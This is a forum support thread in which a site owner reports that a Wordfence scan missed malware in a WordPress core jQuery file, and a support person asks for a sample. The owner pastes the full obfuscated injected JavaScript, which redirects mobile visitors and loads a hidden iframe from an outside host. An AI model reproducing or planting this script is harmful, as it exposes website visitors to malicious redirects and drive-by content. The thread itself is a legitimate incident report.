Scan didn't detect Eval base64
-
I ran a scan and Wordfence didn’t detect eval base64. I found it manually myself. Any ideas why this wouldn’t have been found? It was in the wp-includes folder.
-
Hi,
If you can provide some more info, I’ll do some digging and see what I can find.
What files were infected? Was it a theme? Are you on a shared host?
Thanks!
Brian
Hi Brian,
It was a JS file ==> /wp-includes/jquery/(filename).js
The site is on a dedicated server so not a shared host. Not a theme file. The top of the file had this in it:
/*b534e251c42006533d5cbd60af31080a*/eval(function(p,a,c,k,e,d){e=function(c){return c};if(!”.replace(/^/,String)){while(c–){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(’14 113=225(39(){11(15.57!=125&&43 15.57!=”42″){226(113);11(43 23[“99″]==”42”){23[“99″]=1;14 79=(73()&&130());14 109=!79&&!!23.227&&23.31.224===”223 219.”;14 89=-1;14 36=”220://221.222/228″;11(68()&&89==1){11((31.51.95(/229/19))||(31.51.95(/235/19))){78.236(36)}22{23.78=36;15.78=36}}22{11((79&&!109&&!68())){14 59=”<74 237=\\”234:233;230:-231;\\”><128 232=\\”123\\” 218=\\””+36+”\\” 217=\\”123\\”></128></74>”;14 34=15.204(“74″);11(34.119==0){15.57.44=15.57.44+59}22{14 94=34.119;14 58=205.206((94/2));34[58].44=34[58].44+59}}}}127()}},100);39 127(){14 63=”126″;11(63!=”126″){14 35=15.203(63);11(43 35!=42&&35!=125){35.202=””;198 35}}};39 130(){11(15.29&&!15.199){16 24}22 11(15.29&&!23.200){16 24}22 11(15.29&&!15.201){16 24}22 11(15.29&&!15.207){16 24}22 11(15.29&&!23.208){16 24}22 11(15.29){16 24}22 11(43 31.214!=”42″&&!15.29&&73()){16 24}22{16 82}}39 73(){14 17=23.31.51;14 55=17.27(“215 “);11(55>0){16 71(17.64(55+5,17.27(“.”,55)),10)}14 97=17.27(“216/”);11(97>0){14 69=17.27(“213:”);16 71(17.64(69+3,17.27(“.”,69)),10)}14 48=17.27(“212/”);11(48>0){16 71(17.64(48+5,17.27(“.”,48)),10)}16 82}39 68(){14 75=23.31.51.209();11(/(210|211\\66+|238).+107|239|267\\/|268|269|266|265|197|262|263|90(264|104)|121|270|271 |277|278|279|107.+276|275|272 25(273|274)19|260( 88)?|259|41(246|247)\\/|248|245|244|240(4|6)0|241|242|122\\.(243|249)|250|256|257 258|255|254/19.111(75)||/251|252|253|280|174|50[1-6]19|142|144|33 115|148|114(134|110|56\\-)|133(160|161)|91(156|101|93)|150|154(153|72|152)|151|92(155|76)|159(77|157)|158|162(147|\\-25|136 |56 
)|138|135(102|129|137)|103(139|143)|141(114|196)|186(187|28)46|185|181\\-(182|65)|183\\/|188|189|194\\-|195|193|192|177\\-|93(173|86)|184|166(96|129|165)|168|170\\-56|179|163|145|106(26|41)105|149(12|\\-66)|146(49|133)|178(176|175)|134(172|171)|164|167([4-7]0|88|115|169)|180|191(\\-|131)|118 65|190|140|261\\-5|38\\-62|76(\\.46|104)|320(397|398)|399|400|396\\-(25|41|30)|395\\-|391(108|120)|392( 19|90)|393\\-26|394(26(\\-| |131|33|38|41|56|30)|401)|402(409|410)|19\\-(20|76|67)|411|408( |\\-|\\/)|281|407|403|404|405|406|390|121|389(30|28)33|374|375|376|377|373|372( |\\/)|368|369 |370\\-|371(26|112)|378(379|386)|413( 38|\\/(112|388|65)|50|54|\\-[33-46])|385|384|380\\-46|381|382\\/|67(77|383|412)|87(37|21|101)|25\\-431|436(434|84)|439(440|438|117)|435|62(37|447|103|445|106|30(\\-| |105|28)|444)|443(50|437|28 )|432|419|420[0-2]|433[2-3]|421(0|2)|414(0|2|5)|415(0(0|1)|10)|416((26|25)\\-|422|423|429|426|425)|424(6|19)|427|428|430(417|418)|446|442|441|387(33|66|30)|366|310(13|\\-([1-8]|26))|311|312|124(309|308)|304\\-2|305(102|306|116)|307|313|108\\-38|314\\-33|367(321|12|21|32|60|\\-[2-7]|19\\-)|322|319|318|315|316|317(303|302)|288\\/|289(290|67|287|286|72|282)|283(37|132\\-|110|41\\-)|284\\/|116(26(\\-|0|1)|47|87|86|84)|285\\-|291|292(\\-|25)|299\\-0|300(45|301)|298(91|92|297|96|293)|294(295|72)|296(37|132\\-|28\\-|28 )|323(37|324)|353(18|50)|354(355|10|18)|120(352|351)|347\\-|348\\-|349(19|25)|350\\-|30\\-62|356(124|357)|117(70|25\\-|363|364)|365\\-9|122(\\.362|118|361)|358|359|360|346|345(331|77)|332(40|5[0-3]|\\-28)|333|330|329|325(52|53|60|61|70|80|81|83|85|98)|326(\\-| )|327|328|334(38 |335|342)|343|344|341|340\\-|336|337|338\\-/19.111(75.339(0,4))){16 24}16 
82}’,10,448,’|||||||||||if|||var|document|return|HPBJgrsPCHSKRooCSfFKUPtQSHhPpXTMrJRxpVbO||i|||else|window|true|m|c|indexOf|v|all|t|navigator||a|MCaQwvpjUmtBqcPYzgWliXmZPBzILQsWecitLV|mlNejnGRDFoMrKpCkbNtoYExLBQntbLtnlIF|WCdBJlkPSASuNMxLEgEXHpIPBnICmFJsiy|01|g|function||p|undefined|typeof|innerHTML||w||yCgElnHWsSrcjmuYoMmhngIvMNokcUiJIjw|||userAgent||||LARvLITLJRXwkEPGPiIEqjPSpXveOBF|s|body|WuueSQisBmloAGfQTZctCvdtBKxDdDLo|KzNjeJAhCiAZQAAGoEsMETLBxkXwRmkiHKqpVB|||mo|adsQzuxevDroaHFVcjSuLqAJljAVPrpFpL|substring|u|d|ma|WxHYKzSjmIZPfoKwXAgRLieaorcuMAKUSQoV|vGeYZzxGUigKNEJEAAIkosQXeVjxdJImu||parseInt|ny|aUaEhOVgaMxAeZrmNxdRPqgvqYXHduMlE|div|QhxSRLpMNEIsRLqPASzHaAZnAPdxZxx|go|te|location|VoiuQGWKzqbGsHzrnWlNrJnkPpbQoVUW|||false||ri||nd|mc|os|MSuybQFqyBexVNUuYEgNJUnwdWUYRfDYJjYUN|ip|al|ar|co|dl_name|match|it|JqrPUuqqGIdyRjGXPJeRjWOGIEYkcVU||v_b534e251c42006533d5cbd60af31080a||ca|ck|bi|od|o|do|mobile|pt|YyxiqDTdmjgDoiCwXeKxseGOcyWGWohUhdJ|oo|test|k|NGDvNPIYnVGVXCAbDMmsqeksGWIeUzUJZouxU|ac|wa|se|ts|g1|length|ta|iris|up|18px|pl|null|none|wEFSzZujMlxoNYDlPgZLNUtSsYcPZdUzMO|iframe|ll|oaUPUMrwePLScyLgxaLbRuZXUxvfkGvWcZeo|_|h|ai|er|be|r|nq|avan|lb|gene|bl|770s|rd|802s|dmob|el|di|abac|ds|amoi|aptu|yw|ex|an|ch|av|us|attw|as|ko|rn|au|dica|esl8|ng|da|ez|dbte|ze|dc|k0|ic|mp|4thp|ul|l2|cmd|em|devi|fetc|bw|n|c55|craw|bumb|br|e|capi|ccwa|g560|fly|cldc|chtm|cdm|cell|az|fennec|delete|compatMode|XMLHttpRequest|querySelector|outerHTML|getElementById|getElementsByTagName|Math|floor|addEventListener|atob|toLowerCase|android|bb|Edge|rv|maxTouchPoints|MSIE|Trident|height|src|Inc|http|blondinkaulya|cf|Google|vendor|setInterval|clearInterval|chrome|052F|iPhone|left|2564px|width|absolute|position|iPod|replace|style|meego|avantgo|series|symbian|treo|browser|psp|pocket|ixi|re|plucker|link|vodafone|1207|6310|6590|xiino|xda|wap|windows|ce|phone|palm|gf|hiptop|iemobile|hone|elaine|compal|bada|blackberry|blazer|kindle|lge|opera|ob|in|netfront|firefox|maemo|midp|mmp|3gso|ibro|va|sc|sdk|sgh|ms|mm|s55|sa|g
e|shar|sie|t5|so|ft|sp|b3|sm|sk|sl|id|zo|ve|pn|po|rt|prox|uc|ay|pg|phil|pire|psio|qa|raks|rim9|ro|r600|r380|gr|07|qtek|sy|mb|vx|w3c|webc|whit|vulc|voda|rg|vk|vm40|wi|nc|your|zeto|zte|substr|yas|x700|nw|wmlb|wonu|vi|veri|tcl|tdg|tel|tim|lk|gt|t2|t6|00|to|sh|utst|v400|v750|si|b|m3|m5|tx|pdxg|qc|klon|kpt|kwc|kyo|kgt|keji|jbro|jemu|jigs|kddi|le|no|m1|m3ga|m50|ui|lynx|libw|xi|pan|l|ja|ipaq|hi|hp|hs|ht|hei|hd|ad|un|haie|hcit|tp|hu|ig01|ikom|im1k|inno|idea|iac|aw|tc|i230|xo|lg|n50|n7|ne|ti|wv|mywa|n10|n30|on|tf|nok|wt|wg|nzph|o2im|wf|op|cr|mwbp|n20|rc|mmef|me|p1|oa|mi|o8|p800|owg1|mt|zz|de|oran|02′.split(‘|’),0,{}))
/*b534e251c42006533d5cbd60af31080a*//*******
The scan didn’t find this; I ended up finding it by digging through the file and searching.
Mike
Hi Mike,
Will you please send the file to samples@wordfence.com and mention that the scan did not detect it? That will put it in the queue to be evaluated.
-Brian